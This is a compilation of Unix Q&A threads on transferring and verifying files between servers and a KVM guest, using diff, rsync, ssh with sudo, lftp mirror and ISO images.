How, specifically, can I do this?
|
I’d simply use the diff command:
diff -rq --no-dereference /path/to/old/drive/ /path/to/new/drive/
This reads and compares every file in the directory trees and reports any differences. The -r flag compares the directories recursively while the -q flag just prints a message to screen when files differ – as opposed to printing the actual differences (as it does for text files). The --no-dereference flag may be useful if there are symbolic links that differ, e.g., in one directory, a symbolic link, and in its corresponding directory, a copy of the file that was linked to.
If the diff command prints no output, that means the directory trees are indeed identical; you can run echo $? to verify that its exit status is 0, indicating that both sets of files are the same.
I don’t think computing CRCs or checksums is particularly beneficial in this case. It would make more sense if the two sets of files were on different systems and each system could compute the checksums for their own set of files so only the checksums need to be sent over the network. Another common reason for computing checksums is to keep a copy of the checksums for future use.
| Verifying a large directory after copy from one hard drive to another |
1,302,715,144,000 |
Here is the situation:
I am uploading a large file from client A to a server using sftp.
I also need to download this file from the server to client B over ssh.
What I would like to do is start the transfer from the server to client B when the upload is still happening from client A.
What is the best method/tool to get this done?
UPDATE:
The answers so far are interesting--I'll be sure to read and test them all. Bonus points for answers that don't depend on controlling how Client A is uploading the file. (ie. the only thing we know from client A is that the file is being written to a known filename.)
|
For a single file instead of using SFTP you could pipe the file over ssh using cat or pv at the sending side and using tee on the middle server to both send the data to a file there and send a copy over the another ssh link the other side of which just writes the data to a file. The exact voodoo required I'll leave as an exercise for the reader, as I've not got time to play right now (sorry). This method would only work if the second destination is publicly accessible via SSH which may not be the case as you describe it as a client machine.
Another approach, which is less "run and wait" but may otherwise be easier, it to use rsync between the server and client B. The first time you run this it may get a partial copy of the data, but you can just re-run it to get more data afterwards (with one final run once the Client1->Server transfer is complete). This will only work if the server puts the data direct into the right file-name during the SFTP transfer (sometimes you will see the data going into a temporary file which is then renamed once the file is completely transferred - this is done to make the file update more atomic but will render the rsync idea unusable). You could also use rsync for the C1->S transfer instead of scp (if you use the --inplace option to avoid the problem mentioned above) - using rsync would also give you protection against needing to resend everything if the C1->Server connection experiences problems during a large transfer (I tend to use rsync --inplace -a --progress <source> <dest> instead of scp/sftp when rsync is available, for this "transfer resume" behaviour).
To summarise the above, running:
rsync --inplace -a --progress <source> user@server:/<destination_file_or_folder>
on client1 then running
rsync --inplace -a --progress user@server:/<destination_file_or_folder> <destination_on_cli2>
on client2 repeatedly until the first transfer is complete (then running once more to make sure you've got everything). rsync is very good at only transferring the absolute minimum it needs to update a location instead of transferring the whole lot each time. For paranoia you might want to add the --checksum option to the rsync commands (which will take much more CPU time for large files but won't result in significantly more data being transfered unless it is needed) and for speed the --compress option will help if the data you are transferring is not already in a compressed format.
| How to copy a file that is still being written over ssh? |
1,302,715,144,000 |
I have two servers. One of them has 15 million text files (about 40 GB). I am trying to transfer them to another server. I considered zipping them and transferring the archive, but I realized that this is not a good idea.
So I used the following command:
scp -r usrname@ip-address:/var/www/html/txt /var/www/html/txt
But I noticed that this command just transfers about 50,000 files and then the connection is lost.
Is there any better solution that allows me to transfer the entire collection of files? I mean to use something like rsync to transfer the files which didn't get transferred when the connection was lost. When another connection interrupt would occur, I would type the command again to transfer files, ignoring those which have already been transferred successfully.
This is not possible with scp, because it always begins from the first file.
|
As you say, use rsync:
rsync -azP /var/www/html/txt/ username@ip-address:/var/www/html/txt
The options are:
-a : enables archive mode, which preserves symbolic links and works recursively
-z : compress the data transfer to minimise network usage
-P : to display a progress bar and enables you to resume partial transfers
As @aim says in his answer, make sure you have a trailing / on the source directory (on both is fine too).
More info from the man page
| Transferring millions of files from one server to another |
1,302,715,144,000 |
I'd like to copy squid.conf from one server to another.
The servers don't talk to each other. I'd like to go through my workstation.
Both servers have the file, so it will be overwritten on the target.
The files have 600 permission and are owned by root.
root login via ssh is disabled (PermitRootLogin no).
I'd like to do it in one line, if possible, since it will be a part of a setup guide.
I know to do
ssh source 'tar czpf - -C /etc/squid/ squid.conf' | \
ssh target 'tar xzpf - -C /etc/squid/'
to copy files between servers and preserve permissions. However, in this case I will get "Permission denied".
I also know I can do this:
ssh -t source 'sudo cat /etc/squid/squid.conf'
This way the -t allows sudo to ask for the admin password before outputing the content of the file.
The problem is, I don't know how to combine those techniques into something that will ask for the sudo password on each server, and transfer the file to its destination. Is this possible?
UPDATE: Here's the best I could come up with:
ssh -t source 'sudo tar czf /tmp/squid.tgz -C /etc/squid squid.conf' && \
ssh source 'cat /tmp/squid.tgz' | \
ssh target 'cat >/tmp/squid.tgz' && \
ssh -t source 'sudo rm /tmp/squid.tgz' && \
ssh -t target \
'sudo tar xzf /tmp/squid.tgz -C /etc/squid && sudo rm /tmp/squid.tgz'
Calling this a one-liner seems like a stretch. I think I'll just break it down to separate steps in the setup guide.
|
It's easier to chain ssh with ssh than to chain ssh with sudo. So changing the ssh server configuration is ok, I suggest opening up ssh for root of each server, but only from localhost. You can do this with a Match clause in sshd_config:
PermitRootLogin no
Match Host localhost
PermitRootLogin yes
Then you can set up a key-based authentication chain from remote user to local user and from local user to root. You still have an authentication trail so your logs tell you who logged in as root, and the authentication steps are the same as if sudo was involved.
To connect to a server as root, define an alias in ~/.ssh/config like this:
Host server-root
HostName server.example.com
User root
ProxyCommand "ssh server.example.com nc %h %p"
If you insist on using sudo, I believe you'll need separate commands, as sudo insists on reading from a terminal (even if it has a ticket for your account)¹, and none of the usual file copying methods (scp, sftp, rsync) support interacting with a remote terminal.
Sticking with ssh and sudo, your proposed commands could be simplified. On each side, if you have sudo set up not to ask a password again, you can run it once to get over with the password requirement and another time to copy the file. (You can't easily copy the file directly because the password prompt gets in the way.)
ssh -t source 'sudo true'
ssh -t target 'sudo true'
ssh -t source 'sudo cat squid.conf' |
ssh -t target 'sudo tee /etc/squid/squid.conf'
¹ unless you have NOPASSWD, but then you wouldn't be asking this.
| Copying protected files between servers in one line? |
1,302,715,144,000 |
I need to upload a directory with a rather complicated tree (lots of subdirectories, etc.) by FTP. I am unable to compress this directory, since I do not have any access to the destination apart from FTP - e.g. no tar. Since this is over a very long distance (USA => Australia), latency is quite high.
Following the advice in How to FTP multiple folders to another server using mput in Unix?, I am currently using ncftp to perform the transfer with mput -r. Unfortunately, this seems to transfer a single file at a time, wasting a lot of the available bandwidth on communication overhead.
Is there any way I can parallelise this process, i.e. upload multiple files from this directory at the same time? Of course, I could manually split it and execute mput -r on each chunk, but that's a tedious process.
A CLI method is heavily preferred, as the client machine is actually a headless server accessed via SSH.
|
lftp would do this with the command mirror -R -P 20 localpath - mirror syncs between locations, and -R uses the remote server as the destination , with P doing 20 parallel transfers at once.
As explained in man lftp:
mirror [OPTS] [source [target]]
Mirror specified source directory to local target directory. If target
directory ends with a slash, the source base name is appended to target
directory name. Source and/or target can be URLs pointing to directo‐
ries.
-R, --reverse reverse mirror (put files)
-P, --parallel[=N] download N files in parallel
| How can I parallelise the upload of a directory by FTP? |
1,302,715,144,000 |
I have to make a configuration file available to guest OS running on top of KVM hyper-visor.
I have already read about folder sharing options between host and guest in KVM with 'qemu' and 9P virtio support. I would like to know about any simple procedure which can help in one time file transfer from host to guest.
Please let me know, how to transfer file while guest OS is running as well as a possible way to make the file available to guest OS by the time it starts running(like packaging the file and integrating with the disk-image if possible).
Host OS will be linux.
|
Just hit upon two different ways:
Transfer files via network. For example you can run httpd on the host and use any web browser or wget/curl to download files. Probably most easy and handy.
Build ISO image on the host with files you want to transfer. Then attach it to the guest's CD drive.
genisoimage -o image.iso -r /path/to/dir
virsh attach-disk guest image.iso hdc --driver file --type cdrom --mode readonly
You can use mkisofs instead of genisoimage.
You can use GUI like virt-manager instead of virsh CUI to attach an ISO image to the guest.
You need to create a VM beforehand, supply that VM's ID as guest. You can see existing VMs by virsh list --all.
| How to send/upload a file from Host OS to guest OS in KVM?(not folder sharing) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.